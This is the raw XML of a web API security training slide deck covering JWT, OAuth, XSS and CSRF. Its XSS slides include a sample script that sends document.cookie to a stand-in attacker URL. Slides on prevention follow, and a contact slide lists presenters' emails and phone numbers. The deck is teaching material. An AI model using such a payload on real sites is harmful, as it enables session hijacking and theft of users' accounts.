              <a:t>So by verifying the JWT, the application adds a layer of trust between itself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and the user.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JWT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666750"/>
            <a:ext cx="6912768" cy="689248"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Steps to create JWT?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Step1: Generate Token</a:t>
            </a:r>
          </a:p>
          <a:p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0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276350"/>
            <a:ext cx="6705600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JWT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666750"/>
            <a:ext cx="6912768" cy="689248"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Steps to create JWT?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Step2: Validate Token</a:t>
            </a:r>
          </a:p>
          <a:p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0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298734"/>
            <a:ext cx="5867400" cy="3844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JWT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666750"/>
            <a:ext cx="6912768" cy="689248"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Steps to create JWT?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>E.g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: - Result :-</a:t>
            </a:r>
          </a:p>
          <a:p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0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733550"/>
            <a:ext cx="6784658" cy="267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2724150"/>
            <a:ext cx="4791075" cy="457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0" y="3790950"/>
            <a:ext cx="6486144" cy="1173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threats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666750"/>
            <a:ext cx="6912768" cy="460648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XSS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676400" y="1047750"/>
            <a:ext cx="7467600" cy="3429000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What is XSS?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Cross-Site Scripting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attacker makes the victim’s browser execute a script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Ways to inject :- </a:t>
            </a:r>
          </a:p>
          <a:p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Query parameters:-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E.g1:-When you type your search query and press submit, the generated URL may look something like this:</a:t>
            </a:r>
          </a:p>
          <a:p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[Original] : https://example.com/search?query=Alan</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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[XSS] : https://example.com/search?query=&lt;script&gt;alert(1)&lt;/script&gt;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E.g2:-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Could steal the victim’s cookie.</a:t>
            </a:r>
          </a:p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&lt;script&gt;</a:t>
            </a:r>
          </a:p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Image().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="http://attackerurl.com/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storecookie?cookie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="+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document.cookie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&lt;/script&gt;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96200" y="2790825"/>
            <a:ext cx="1371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3509287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JWT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666750"/>
            <a:ext cx="6912768" cy="460648"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/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524000" y="1123950"/>
            <a:ext cx="7543800" cy="3962400"/>
          </a:xfrm>
        </p:spPr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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4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9832617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/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US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en-US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                THANK YOU !!</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US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2590800" y="895350"/>
            <a:ext cx="4626768" cy="3886200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r>
              <a:rPr lang="en-US" sz="2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Contact :-</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-U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r>
              <a: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          </a:t>
            </a:r>
            <a:r>
              <a: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  <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>vishal.garg@jktech.com</a:t>
            </a:r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r>
              <a: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           </a:t>
            </a:r>
            <a:r>
              <a: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  <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>shivam.sahu@jktech.com</a:t>
            </a:r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r>
              <a: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          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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Vishal</a:t>
            </a:r>
            <a:r>
              <a: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Garg</a:t>
            </a:r>
            <a:r>
              <a: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(7011735763)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a: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           </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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Shivam</a:t>
            </a:r>
            <a:r>
              <a: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Sahu</a:t>
            </a:r>
            <a:r>
              <a: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(8178580295)</a:t>
            </a:r>
          </a:p>
          <a:p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r>
              <a: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Reference :- </a:t>
            </a:r>
          </a:p>
          <a:p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DotNetBig.Blogspot.com</a:t>
            </a:r>
          </a:p>
          <a:p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 descr="wazapp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71800" y="2724150"/>
            <a:ext cx="633984" cy="6339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Content Placeholder 10" descr="email-2-icon.png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2971800" y="1885950"/>
            <a:ext cx="633984" cy="6339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threats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666750"/>
            <a:ext cx="6912768" cy="460648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Ways to prevent XSS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676400" y="1047750"/>
            <a:ext cx="7467600" cy="358140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 input user is validated – But we have disable this.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 HTML output is encoded – We have disable this as well.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728788"/>
            <a:ext cx="43338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638425"/>
            <a:ext cx="45815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202177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threats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666750"/>
            <a:ext cx="6912768" cy="460648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CSRF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600200" y="1123950"/>
            <a:ext cx="7543800" cy="401955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Cross-Site Request Forgery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 malicious site sends a request to a vulnerable site where the user is currently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logged in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657350"/>
            <a:ext cx="4625721" cy="3156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547400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threats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742950"/>
            <a:ext cx="6912768" cy="460648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Ways to prevent  CSRF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676400" y="971550"/>
            <a:ext cx="6912768" cy="2995737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Anti-Forgery Tokens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43625" y="1338262"/>
            <a:ext cx="300037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476375"/>
            <a:ext cx="44767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233612"/>
            <a:ext cx="3381375" cy="2718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814030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7792</TotalTime>
  <Words>1827</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (16:9)</PresentationFormat>
  <Paragraphs>582</Paragraphs>
  <Slides>61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61</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="63" baseType="lpstr">
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>Custom Design</vt:lpstr>
      <vt:lpstr>Slide 1</vt:lpstr>
      <vt:lpstr>Web Api Security</vt:lpstr>
      <vt:lpstr>Security Threats</vt:lpstr>
      <vt:lpstr>Security threats</vt:lpstr>
      <vt:lpstr>Security threats</vt:lpstr>
      <vt:lpstr>Security threats</vt:lpstr>
      <vt:lpstr>Security threats</vt:lpstr>
      <vt:lpstr>Security threats</vt:lpstr>
      <vt:lpstr>Security threats</vt:lpstr>
      <vt:lpstr>Security threats</vt:lpstr>
      <vt:lpstr>  Security threats </vt:lpstr>
      <vt:lpstr>Security threats</vt:lpstr>
      <vt:lpstr>Security threats</vt:lpstr>
      <vt:lpstr>Security threats</vt:lpstr>
      <vt:lpstr>      Prevention:- </vt:lpstr>
      <vt:lpstr>Security threats</vt:lpstr>
      <vt:lpstr>Security threats</vt:lpstr>
      <vt:lpstr>Security threats</vt:lpstr>
      <vt:lpstr>Security threats</vt:lpstr>
      <vt:lpstr>Security threats</vt:lpstr>
      <vt:lpstr>Security threats</vt:lpstr>
      <vt:lpstr>Slide 22</vt:lpstr>
      <vt:lpstr>Token Based Authentication</vt:lpstr>
      <vt:lpstr>Token Based Authentication</vt:lpstr>
      <vt:lpstr>Token Based Authentication</vt:lpstr>
      <vt:lpstr>Token Based Authentication</vt:lpstr>
      <vt:lpstr>What is OAuth?</vt:lpstr>
      <vt:lpstr>Why OAuth?</vt:lpstr>
      <vt:lpstr>Building Blocks of OAuth</vt:lpstr>
      <vt:lpstr>Oauth – Tokens</vt:lpstr>
      <vt:lpstr>Oauth – Tokens</vt:lpstr>
      <vt:lpstr>Oauth – Grant Types</vt:lpstr>
      <vt:lpstr>Oauth – End Points</vt:lpstr>
      <vt:lpstr>Oauth</vt:lpstr>
      <vt:lpstr>OWIN</vt:lpstr>
      <vt:lpstr>OWIN</vt:lpstr>
      <vt:lpstr>OWIN</vt:lpstr>
      <vt:lpstr> OWIN </vt:lpstr>
      <vt:lpstr>OWIN</vt:lpstr>
      <vt:lpstr>OWIN</vt:lpstr>
      <vt:lpstr>OWIN</vt:lpstr>
      <vt:lpstr>OWIN</vt:lpstr>
      <vt:lpstr>OWIN</vt:lpstr>
      <vt:lpstr>OWIN</vt:lpstr>
      <vt:lpstr>OWIN</vt:lpstr>
      <vt:lpstr>JWT</vt:lpstr>
      <vt:lpstr>JWT</vt:lpstr>
      <vt:lpstr>JWT</vt:lpstr>
      <vt:lpstr>JWT</vt:lpstr>
      <vt:lpstr>JWT</vt:lpstr>
      <vt:lpstr>JWT</vt:lpstr>
      <vt:lpstr>JWT</vt:lpstr>
      <vt:lpstr>JWT</vt:lpstr>
      <vt:lpstr>JWT</vt:lpstr>
      <vt:lpstr>JWT</vt:lpstr>
      <vt:lpstr>JWT</vt:lpstr>
      <vt:lpstr>JWT</vt:lpstr>
      <vt:lpstr>JWT</vt:lpstr>
      <vt:lpstr>JWT</vt:lpstr>
      <vt:lpstr>JWT</vt:lpstr>
      <vt:lpstr>                  THANK YOU !! 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Manish</cp:lastModifiedBy>
  <cp:revision>199</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2014-04-01T16:27:38Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-03-11T05:38:41Z</dcterms:modified>
</cp:coreProperties>
</file>